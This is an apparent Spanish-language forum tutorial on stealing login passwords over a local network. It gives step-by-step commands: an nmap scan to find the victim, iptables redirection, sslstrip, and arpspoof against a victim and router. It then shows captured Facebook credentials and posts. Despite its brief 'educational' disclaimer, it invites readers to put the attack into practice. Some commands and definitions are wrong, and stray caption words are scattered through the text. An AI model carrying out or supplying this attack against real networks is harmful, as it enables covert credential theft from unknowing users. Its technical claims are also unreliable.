Sacando Passwords de Manera silenciosa

Aviso:

Este tema esta elaborado con fines educativos y éticos no me hago responsable del uso que se le de.

Definiciones de Conceptos utilizados:

Antes que nada veamos algunas pequeñas definiciones de ciertos temas y conceptos necesarios para la comprencion del post.

SSL:

Su acronimo significa Secure Sockets Layer (capas de enchufes seguros) el cual es un protocolo que es utilizado para crear conexiones seguras de servidor a cliente en http y https encriptando los datos de los usuarios que navengan por internet por medio de certificados digitales RSA proporcionados por la empresa Verising .

Ataques Man in the middle

Es un ataque en el que el enemigo adquiere la capacidad de leer, insertar y modificar a voluntad, los mensajes entre dos partes sin que ninguna de ellas conozca que el enlace entre ellos ha sido violado.

SSLSTRIP

Es una herramienta que nos permite suplantar los certificados de ssl y redireccionar el trafico de http y https hacia nuestro equipo para ver datos como logins y passwords cifrados por ssl en paginas web.

Herramientas necesarias.

*nmap: podemos obtenerlo haciendo click AQUÌ ó instalarlo con Código:
sudo apt-get install nmap

*Dsniff: Obtenlo AQUÌ ó Código: sudo apt-get install dsniff

Python y dependencias de él para sslstrip: por lo general las distros de linux ya traen python solo queda instalar las dependencias con Código: sudo apt-get install python-twisted-web

Y si no tienen python Código: sudo apt-get install python

*Sslstrip Lo descargamos de AQUÌ
lo descomprimimos y tipeamos en la consolapara instalarlo ya con el directorio de la carpeta d sslstrip :
Código: sudo python ./setup.py install

Bien!

Paso 1: checamos nuestra ip y mapeamos la red con nmap para identificar el router y la victima:
chekamos la ip con Código: ifconfig

Ubuntu

Mapeamos la red con rango 0-255 para que capture todas las maquinas presentes en la red:

Código: sudo nmap -PN 192.168.0.0-255

Facebook

Paso 2: Activamos el forwarding para reenvio de paquetes pues al hacer el Mitm dejariamos sin conexion a la victima es por eso que se activa.
Se activa con: cat /proc/sys/net/ipv4/ip_forward

Y para comprobar que esta activado "1" ponemos en la consola:

cat /proc/sys/net/ipv4/ip_forward=1

Veamos

Linux

Paso 3 : Redireccionamos el trafico de http y https a un puerto a la escucha con:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

passwords

Paso 4: Ponemos en marcha el sslstrip con: sudo sslstrip -w HxC - l 8080

Nota: -w aqui va el nombre con que quieren que se guarde el log del sslstrip y -l es para que escuche el trafico del puerto al cual redireccionamos el trafico de http

Paso 5 Hacemos un envenenamiento de arp o arpspoof con: arpspoof -i interface de red (wlan0 o etho) -t ip victima ip del router

vean:

Sacando Passwords de Manera silenciosa

en mi caso la ip victima es 192.168.0.2 y la del router es 192.168.0.1

Ahora solo queda esperar a que alguen caiga

miren:

aqui en la maquina virtual con win xp estamos entrando en Facebook

Ubuntu

y luego que ya entramos a FB

Facebook

Vean que registra el sslstrip en el archivo de texto que crea por default:

Linux

Ahora comentamos un enlace de alguien miren:

passwords

Y sslstrip hace de las suyas y nos muestra tambien el comentario que realizamos:

Sacando Passwords de Manera silenciosa

Como pueden ver con Sslstrip podemos obtener passwords sin levantar sospechas como lo hariamos con ettercap por si solo, y tambien podemos ver lo que publicamos en enlaces etc etc ... asi que ponganlo en practica pero tomando en cuenta no dañar la integridad de alguien mas pues no deceariamos que nos hicieran algo asi a nosotros


Para cualquier duda queja o lo que sea, diganmelo por los cometarios.

No aclaro dudas por MP, las dudas de uno pueden ser las dudas de muchos.



Saludos

Ubuntu

Facebook